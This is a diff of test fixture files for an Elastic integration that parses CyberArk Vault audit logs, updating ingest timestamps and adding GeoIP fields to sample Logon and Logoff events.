@@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420973400Z", + "ingested": "2021-12-14T14:42:39.755855157Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420978900Z", + "ingested": "2021-12-14T14:42:39.755855769Z", "original": "\u003c5\u003e1 2021-03-04T19:10:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:20\",\"IsoTimestamp\":\"2021-03-04T19:10:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"SCIM-user\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420984300Z", + "ingested": "2021-12-14T14:42:39.755856475Z", "original": "\u003c5\u003e1 2021-03-04T19:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:20\",\"IsoTimestamp\":\"2021-03-04T19:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420989600Z", + "ingested": "2021-12-14T14:42:39.755856891Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
@@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420995100Z", + "ingested": "2021-12-14T14:42:39.755857315Z", "original": "\u003c5\u003e1 2021-03-05T10:18:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 02:18:50\",\"IsoTimestamp\":\"2021-03-05T10:18:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -460,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421000500Z", + "ingested": "2021-12-14T14:42:39.755857771Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -489,6 +489,15 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -536,7 +545,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421003800Z", + "ingested": "2021-12-14T14:42:39.755858160Z", "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -565,6 +574,15 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -612,7 +630,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421007900Z", + "ingested": "2021-12-14T14:42:39.755858549Z", "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", 
@@ -637,6 +655,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -679,7 +706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421012900Z", + "ingested": "2021-12-14T14:42:39.755858960Z", "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -704,6 +731,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -746,7 +782,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421017400Z", + "ingested": "2021-12-14T14:42:39.755859338Z", "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -771,6 +807,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -813,7 +858,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421021100Z", + "ingested": "2021-12-14T14:42:39.755859945Z", "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json index edc4636d847..4c3b29055a7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641097400Z", + "ingested": "2021-12-14T14:42:41.147012483Z", "original": "\u003c5\u003e1 2021-03-08T18:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:19:15\",\"IsoTimestamp\":\"2021-03-08T18:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", 
@@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641105700Z", + "ingested": "2021-12-14T14:42:41.147014696Z", "original": "\u003c5\u003e1 2021-03-08T18:59:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:59:23\",\"IsoTimestamp\":\"2021-03-08T18:59:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641111200Z", + "ingested": "2021-12-14T14:42:41.147015053Z", "original": "\u003c5\u003e1 2021-03-10T08:28:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:28\",\"IsoTimestamp\":\"2021-03-10T08:28:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", 
@@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641116600Z", + "ingested": "2021-12-14T14:42:41.147015408Z", "original": "\u003c5\u003e1 2021-03-10T08:28:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:29\",\"IsoTimestamp\":\"2021-03-10T08:28:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641122300Z", + "ingested": "2021-12-14T14:42:41.147015776Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", 
@@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641127700Z", + "ingested": "2021-12-14T14:42:41.147016125Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -409,6 +409,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -451,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641133Z", + "ingested": "2021-12-14T14:42:41.147016453Z", "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", 
@@ -476,6 +485,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -518,7 +536,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641136800Z", + "ingested": "2021-12-14T14:42:41.147016782Z", "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -543,6 +561,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -585,7 +612,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641141200Z", + "ingested": "2021-12-14T14:42:41.147017120Z", "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -610,6 +637,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -652,7 +688,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641146500Z", + "ingested": "2021-12-14T14:42:41.147017446Z", "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", 
@@ -677,6 +713,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -729,7 +774,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641151100Z", + "ingested": "2021-12-14T14:42:41.147017773Z", "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", @@ -754,6 +799,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -806,7 +860,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641154800Z", + "ingested": "2021-12-14T14:42:41.147018266Z", "original": "\u003c5\u003e1 2021-03-11T17:48:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:28\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:28Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n 